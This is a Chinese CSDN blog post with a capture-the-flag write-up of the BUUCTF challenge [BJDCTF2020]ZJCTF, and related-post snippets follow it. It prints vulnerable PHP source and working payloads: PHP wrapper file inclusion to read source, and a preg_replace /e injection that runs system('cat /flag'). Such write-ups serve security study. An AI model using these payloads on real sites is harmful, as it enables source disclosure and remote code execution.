【BUUCTF】[BJDCTF2020]ZJCTF,不过如此

已于 2022-04-17 15:03:46 修改
阅读量1.1k 收藏
点赞数 1
分类专栏: php 文章标签: 网络安全 php web安全
于 2022-04-14 15:41:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aoao331198/article/details/124172023
版权

看看源码

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

这个地方和之前做过的一道题目几乎一模一样

【BUUCTF】[ZJCTF 2019]NiZhuanSiWei
不多废话直接payload

?text=data://text/plain,I have a dream&file=php://filter/read=convert.base64-encode/resource=next.php

base64解密后拿到next.php源码

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

这个地方是一个新姿势点,学习文章
深入研究preg_replace与代码执行
以后有时间把实验复现一波
这道题目的最终payload

next.php?\S*=${getFlag()}&cmd=system(‘cat /flag’);

aoao今晚吃什么
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
基于python的一款今天吃什么小程序源码
02-22
里面有:程序配置说明.docx、今天吃什么程序使用说明.doc,以及源代码,欢迎大家下载来玩
BUUCTF部分web题目
最新发布
05-06
写题记录
[BJDCTF2020]ZJCTF不过如此(wp)
wikey 的博客
03-30 187
看到file_get_contents()函数,就要联想到用php伪协议,需要用data://协议用filter协议去读下next.php的源码。一道老题,nss和buu上都有这道题,但是同样的步骤在buu上可以做出来但是nss平台上有点问题,就以buu为讲解。data://数据流封装器,以传递相应格式的数据。
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
php代码审计之变量覆盖漏洞 变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局变量注册等。 全局变量覆盖 extarct()变量覆盖 遍历初始化变量 import_request_variables变量覆盖 parse_str()变量覆盖 变量覆盖的种类 全局变量覆盖(PHP5.3.0废弃、PHP5.4.0移除) 当register_global=ON时,变量来源可能是各个不同的地方,比如页面的表单、cookie等 "; if(ini_get("Register_globals"))foreach ($_REQUEST as $k => $v) unset(${$k}); print $a; print $_GET[b]; ?> extract()变量覆盖 PHP extract()函数从数组中把变量导入到当前的符号表中。对于数组中的每个元素,键名用于变量值
[BJDCTF2020]ZJCTF不过如此
05-07 348
<?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_mat.
BUUCTF-web类-[BJDCTF2020]ZJCTF不过如此
weixin_44622228的博客
04-20 1916
BUUCTF-web类-[BJDCTF2020]ZJCTF不过如此 分析代码,ge传入两个参数text和file,text参数利用file_get_contents()函数只读形式打开,打开后内容要与"I have a dream"字符串相匹配,才能执行下面的文件包含$file参数。 看到用的是file_get_contents()函数打开text参数,以及后面的文件包含函数,自然的想到php伪...
BUUCTF [BJDCTF2020]ZJCTF不过如此
Chu_Jian_Xiong的博客
09-29 567
[BJDCTF2020]ZJCTF不过如此考点PHP伪协议preg_replace远程代码执行实操 考点 PHP伪协议 https://www.cnblogs.com/wjrblogs/p/12285202.html preg_replace远程代码执行 https://zhuanlan.zhihu.com/p/47353283 实操 打开题目 乍一看,显然是一个PHP伪协议的题目,要求"I have a dream",以及提示包含next.php PD9waHAKJGlkID0gJF9HRVRb
[BUUCTF][BJDCTF2020]ZJCTF不过如此
cosmoslin的博客
01-24 723
考点 代码审计 命令执行 解题 打开环境 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br&
buuctf-ZJCTF不过如此
m0_62094846的博客
11-21 2662
这是文件包含 ?text=data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=&file=php://filter/read=convert.base64-encode/resource=next.php 前面一段是使用data://伪协议,后面的是读取文件信息 解码得到 这是关于preg_replace的内容 <?php $id = $_GET['id']; $_SESSION['id'] = $id; function...
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
亚信java笔试题 BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native container 环境下 build 和 run web Schrödinger - imagin tags: 查看源码 时间戳 修改cookie 打开网页,发现是个 login fucker,推测题目的意思是找一个能 fuck 的 login page,查看源码发现有一行白色的字体不显示,提示有 test.php,访问发现是个登录框。将 http://localhost/test.php 提交,发现网站貌似开始了爆破,但是爆破成功率却涨的很慢。查看 cookie 发现有个 base64 的 cookie 很可疑,decode 一下发现是提交时的时间戳。 将该 cookie 直接置空,刷新页面就发现成功率接近百分之百,check 一下得到爆破的结果. 通过 av 号在 b 站找到对应的视频,根据
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分,
[BJDCTF2020]ZJCTF不过如此(php双引号、伪协议、preg_replace)
qq_43622442的博客
05-09 1796
[BJDCTF2020]ZJCTF不过如此(php双引号、伪协议、preg_replace) 1.打开网站,审计,第一个if可以用php://input 或者 data://伪协议绕过,php伪协议分析可看php伪协议: 2.然后往下,提示next.php文件,这里可以用php://filter伪协议拿到它的源码: 3.payload: http://90812d78-a226-4cdf-be8f-8baa9961fb89.node3.buuoj.cn/?text=php://input&f
[BJDCTF2020]ZJCTF不过如此(特详解)
热门推荐
qq_74806534的博客
01-24 1万+
而这段代码里面的第一个子匹配项就是${phpinfo()}。编码设定,这是一个可选项,base64 编码中仅包含 0-9,a-z,A-Z,+,/,=,其中 = 是用来编码补白的。我们先看第二个参数中的\1 ,\1实际上就是 \1,而 \1 在正则表达式中有自己的含义,最后一部分为这个 Data URI 承载的内容,它可以是纯文本编写的内容,也可以是经过 base64编码 的内容。单引号中的变量不会被处理。这里我们发现了.变成了_,这是因为php会将传入的非法的参数名转成下滑线,所以我们的正则匹配才会失效。
[bjdctf2020]zjctf不过如此
m0_62593857的博客
08-16 208
preg_replace函数中,用strtolower("\\1")替换正则表达式匹配到的字符串,正则表达式跟$re有关,而$re又是通过GET方法传的参数名称,所以可控,要匹配的$str则是参数值,所以也可控,“\\1”其实就是\1,意思是第一个子匹配项,使用/e修饰符,preg_replace会将 replacement 参数当作 PHP 代码执行。
BUUCTF [web专项39][BJDCTF2020]ZJCTF不过如此
yanglinchiji的博客
11-20 236
这里的 `$pattern` 是一个正则表达式字符串,用于指定搜索的模式, `$replacement` 是替换成的字符串, `$subject` 是要搜索和替换的原始字符串或字符串数组。在 PHP 中,`preg_replace` 是一个强大的正则表达式替换函数。它可以在一个字符串中使用正则表达式搜索和替换指定的文本。`preg_replace` 函数返回一个替换后的字符串或数组。作为正则表达式匹配条件的参数名 且 这个参数值为的"getFlag();( 开始定义一个捕获分组,并匹配其中的子表达式;
BUUCTF [BJDCTF2020] ZJCTF不过如此
Senimo
12-10 513
BUUCTF [BJDCTF2020] ZJCTF不过如此 考点: php伪协议读取源码 函数preg_replace()在\e模式下,存在代码执行漏洞 对于传入的非法的$_GET数组参数名,会将其转换成下划线_ 启动环境,给出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I
buuctf ACTF2020 Include
09-16
根据提供的引用内容,buuctf ACTF2020的Include功能可能存在文件包含漏洞。通过将URL中的参数修改为"?file=php://filter/convert.base64-encode/resource=flag.php",可以尝试读取flag.php文件并将其内容以Base64编码形式返回。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值